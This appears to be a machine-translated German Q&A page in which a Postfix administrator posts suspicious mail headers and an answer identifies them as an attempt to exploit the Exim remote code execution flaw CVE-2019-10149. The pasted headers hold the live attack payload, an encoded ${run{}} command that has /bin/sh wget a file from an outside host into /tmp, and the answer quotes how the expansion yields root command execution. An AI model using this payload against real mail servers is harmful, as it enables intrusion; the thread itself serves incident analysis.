it-swarm.com.de

Ungewöhnliche Mail-Header weisen auf einen MTA-Angriff hin. Wurde ich pwned?

Heute habe ich in meinem Posteingang eine äußerst ungewöhnliche E-Mail gefunden, ohne Betreff, Absender oder Inhalt. Mein Google Mail-Client für Android hat gemeldet, dass die E-Mail von me gesendet wurde, was in meinem Kopf einen nuklearen Alarm auslöste.

Ich hatte Angst, dass jemand mein sicheres Passwort erraten hatte und dass diese E-Mail von meinem Mail Transfer Agent (MTA) stammte, also habe ich mir sowohl die E-Mail selbst als auch die E-Mail-Protokolle angesehen. Das ist nicht passiert.

Ich fand, was für mich wie ein Versuch aussieht, eine Mailserver-Sicherheitslücke auszunutzen, die beide fail2ban und ich habe noch nie davon gehört.

Received: 20
Received: 19
Received: 22
Received: 21
Received: 18
Received: 15
Received: 14
Received: 17
Received: 16
Received: 29
Received: 28
Received: 31
Received: 30
Received: 27
Received: 24
Received: 23
Received: 26
Received: 25
Received: 13
Received: 3
Received: 4
Received: 5
Received: 2
Received: from example.org (localhost [127.0.0.1])
    by example.org (Postfix) with ESMTP id 1FA141219E6
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:52 +0200 (CEST)
Received: from service.com (unknown [xx.xx.xx.xx])
    by example.org (Postfix) with SMTP
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:50 +0200 (CEST)
Received: 1
Received: 10
Received: 11
Received: 12
Received: 9
Received: 6
Received: 7
Received: 8
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Outlook 16.0
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxx22}}@example.org
Authentication-Results: example.org; 
X-DKIM-Authentication-Results: none
Thread-Index: AQHpZJXbpRRTStcSuHvAzmVQv5xuOw==

Analyse: Der Absender hat versucht, das E-Mail-Ziel zu ändern, um den folgenden (codierten) Befehl zu starten und eine potenzielle Sicherheitsanfälligkeit Remotecodeausführung auszunutzen, bei der Sequenzen von Xes eine IP-Adresse bezeichnen

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxxx22}}@example.org


x2Fbinx2Fsht-ctx22wgetx20[IP ADDR]x2ftmpx2f[IP ADDR]x22
/bin/sht-ct#wget [IP ADDR]/tmp/[IP ADDR]#

Trotz sht-ct Da ich mit etwas nicht vertraut bin (oder aus der manuellen URL-Dekodierung falsch übersetzt wurde), gehe ich davon aus, dass alle Angreifer wissen, dass ich Postfix als MTA auf meinem Server verwende.

Frage :

Ich möchte bestätigen, ob dies, wie ich vermute, ein echter Versuch ist, einen Remote-Befehlsausführungsangriff mit einer gestalteten E-Mail durchzuführen. Zweitens fordere ich auf, zu beurteilen, ob ich pwned gewesen bin, und zwar auf andere Weise als durch sorgfältiges Betrachten von top und crontab. Ich muss verstehen, ob dieser Angriff meinen MTA betrifft oder versucht, eine veraltete und gut behobene Sicherheitsanfälligkeit auszunutzen.

Ich habe gerade gehetzt, um Postfix zu aktualisieren, aber ohne Kenntnis der Sicherheitsanfälligkeit (und falls es jemals Postfix betrifft), habe ich wenig Ahnung.

Der Grund, warum ich in öffentlichen Foren Sicherheitsfragen zu MTAs stelle, ist, dass meiner Meinung nach/meiner Erfahrung nach ein gehackter Mailserver in extrem kurzer Zeit im Vergleich zu anderen Arten großen Schaden anrichten kann von Diensten, und das erfordert handeln schnell.

Dies ist ein Versuch, das aktuelle Problem bei der Ausführung von Remotecode auf dem EXIM-Mailserver auszunutzen, d. H. CVE-2019-10149 . Siehe Die Rückkehr des Zauberers: RCE in Exim für Details und auch die Art des Exploits, auf den Sie gestoßen sind. Sie sind sicher, wenn Sie EXIM nicht verwenden oder eine feste Version ausführen.

Aus dem verlinkten Artikel (Hervorhebung hinzugefügt):

Diese Sicherheitsanfälligkeit kann sofort von einem lokalen Angreifer (und von einem Remoteangreifer in bestimmten nicht standardmäßigen Konfigurationen) ausgenutzt werden. Um diese Sicherheitsanfälligkeit in der Standardkonfiguration remote auszunutzen, muss ein Angreifer eine Verbindung zum anfälligen Server 7 Tage lang offen halten (indem er alle paar Minuten ein Byte überträgt). Aufgrund der extremen Komplexität des Exim-Codes können wir jedoch nicht garantieren, dass diese Ausnutzungsmethode einzigartig ist. Es können schnellere Methoden existieren.

[...]

Da expand_string () das Erweiterungselement "$ {run {}}" erkennt und new-> address der Empfänger der zugestellten E-Mail ist, kann ein lokaler Angreifer einfach eine senden Mailen Sie an "$ {run {...}} @ localhost" (wobei "localhost" eine der lokalen_Domänen von Exim ist) und führen Sie beliebige Befehle als root aus (Deliver_drop_privilege ist standardmäßig false). ::

[email protected]:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
89
Steffen Ullrich